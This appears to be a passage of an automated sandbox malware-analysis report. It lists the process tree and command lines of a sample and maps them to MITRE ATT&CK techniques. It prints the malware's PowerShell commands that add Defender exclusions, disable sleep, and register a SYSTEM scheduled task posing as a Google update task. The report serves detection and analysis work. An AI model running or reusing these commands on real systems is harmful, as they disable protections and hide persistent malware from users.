    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    - Command and Scripting Interpreter: PowerShell
    PID:1376 (depth 2)
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    - Command and Scripting Interpreter: PowerShell
    PID:1960 (depth 2)
  C:\Windows\System32\cmd.exe
    command line: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    - Power Settings
    PID:3016 (depth 2)
    C:\Windows\System32\powercfg.exe
      command line: powercfg /x -hibernate-timeout-ac 0
      - Power Settings
      PID:1816 (depth 3)
    C:\Windows\System32\powercfg.exe
      command line: powercfg /x -hibernate-timeout-dc 0
      - Power Settings
      PID:3260 (depth 3)
    C:\Windows\System32\powercfg.exe
      command line: powercfg /x -standby-timeout-ac 0
      - Power Settings
      PID:3100 (depth 3)
    C:\Windows\System32\powercfg.exe
      command line: powercfg /x -standby-timeout-dc 0
      - Power Settings
      PID:5124 (depth 3)
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kehcpg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
    - Command and Scripting Interpreter: PowerShell
    PID:2008 (depth 2)
  C:\Windows\System32\schtasks.exe
    command line: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
    PID:3436 (depth 2)
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#piugs#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
    - Command and Scripting Interpreter: PowerShell
    PID:1948 (depth 2)
  C:\Windows\System32\schtasks.exe
    command line: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
    PID:1648 (depth 2)
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    - Command and Scripting Interpreter: PowerShell
    PID:3948 (depth 2)
  C:\Windows\System32\cmd.exe
    command line: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    - Power Settings
    PID:4624 (depth 2)
    C:\Windows\System32\powercfg.exe
      command line: powercfg /x -hibernate-timeout-ac 0
      - Power Settings
      PID:2712 (depth 3)
    C:\Windows\System32\powercfg.exe
      command line: powercfg /x -hibernate-timeout-dc 0
      - Power Settings
      PID:2104 (depth 3)
    C:\Windows\System32\powercfg.exe
      command line: powercfg /x -standby-timeout-ac 0
      - Power Settings
      PID:4820 (depth 3)
    C:\Windows\System32\powercfg.exe
      command line: powercfg /x -standby-timeout-dc 0
      - Power Settings
      PID:3576 (depth 3)
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kehcpg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
    - Command and Scripting Interpreter: PowerShell
    PID:2584 (depth 2)
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    - Command and Scripting Interpreter: PowerShell
    PID:5568 (depth 2)
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#piugs#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
    - Command and Scripting Interpreter: PowerShell
    PID:6120 (depth 2)
  C:\Windows\System32\schtasks.exe
    command line: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
    PID:2008 (depth 2)
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    - Command and Scripting Interpreter: PowerShell
    PID:5480 (depth 2)
  C:\Windows\explorer.exe
    command line: C:\Windows\explorer.exe
    PID:2364 (depth 2)
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#piugs#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
    - Command and Scripting Interpreter: PowerShell
    PID:3128 (depth 2)
  C:\Windows\System32\schtasks.exe
    command line: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
    PID:4304 (depth 2)
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    - Command and Scripting Interpreter: PowerShell
    PID:6040 (depth 2)
  C:\Windows\System32\cmd.exe
    command line: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    - Power Settings
    PID:4252 (depth 2)
    C:\Windows\System32\powercfg.exe
      command line: powercfg /x -hibernate-timeout-ac 0
      - Power Settings
      PID:5740 (depth 3)
    C:\Windows\System32\powercfg.exe
      command line: powercfg /x -hibernate-timeout-dc 0
      - Power Settings
      PID:5592 (depth 3)
    C:\Windows\System32\powercfg.exe
      command line: powercfg /x -standby-timeout-ac 0
      - Power Settings
      PID:1156 (depth 3)
    C:\Windows\System32\powercfg.exe
      command line: powercfg /x -standby-timeout-dc 0
      - Power Settings
      PID:5604 (depth 3)
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kehcpg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
    - Command and Scripting Interpreter: PowerShell
    PID:3328 (depth 2)
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
  PID:3416 (depth 1)
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
  PID:3440 (depth 1)
C:\Windows\System32\RuntimeBroker.exe
  command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
  PID:3812 (depth 1)
C:\Windows\System32\RuntimeBroker.exe
  command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
  PID:3860 (depth 1)
C:\Windows\system32\DllHost.exe
  command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  PID:3924 (depth 1)
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
  PID:3992 (depth 1)
C:\Windows\system32\DllHost.exe
  command line: C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
  PID:4276 (depth 1)
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
  PID:4372 (depth 1)
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
  PID:5172 (depth 1)
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
  PID:5472 (depth 1)
C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
  PID:2452 (depth 1)
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
  PID:5320 (depth 1)
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
  command line: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
  PID:3692 (depth 1)
C:\Windows\system32\SppExtComObj.exe
  command line: C:\Windows\system32\SppExtComObj.exe -Embedding
  PID:1408 (depth 1)
C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
  PID:5424 (depth 1)
C:\Windows\system32\DllHost.exe
  command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  PID:1868 (depth 1)
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
  PID:2924 (depth 1)
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
  command line: "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
  PID:5520 (depth 1)
C:\Windows\system32\wbem\wmiprvse.exe
  command line: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  - Checks processor information in registry
  PID:4976 (depth 1)
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
  PID:5088 (depth 1)
C:\Windows\System32\rundll32.exe
  command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  PID:3352 (depth 1)
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
  PID:1032 (depth 1)
C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k WerSvcGroup
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  PID:4468 (depth 1)
  C:\Windows\system32\WerFault.exe
    command line: C:\Windows\system32\WerFault.exe -pss -s 452 -p 2500 -ip 2500
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID:1676 (depth 2)
  C:\Windows\system32\WerFault.exe
    command line: C:\Windows\system32\WerFault.exe -pss -s 604 -p 5024 -ip 5024
    PID:2440 (depth 2)
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1)
  - PowerShell (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Power Settings (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Defense Evasion
- Indicator Removal (1)
  - Clear Windows Event Logs (1)
- Modify Registry (1)
- Subvert Trust Controls (1)
  - SIP and Trust Provider Hijacking (1)
Downloads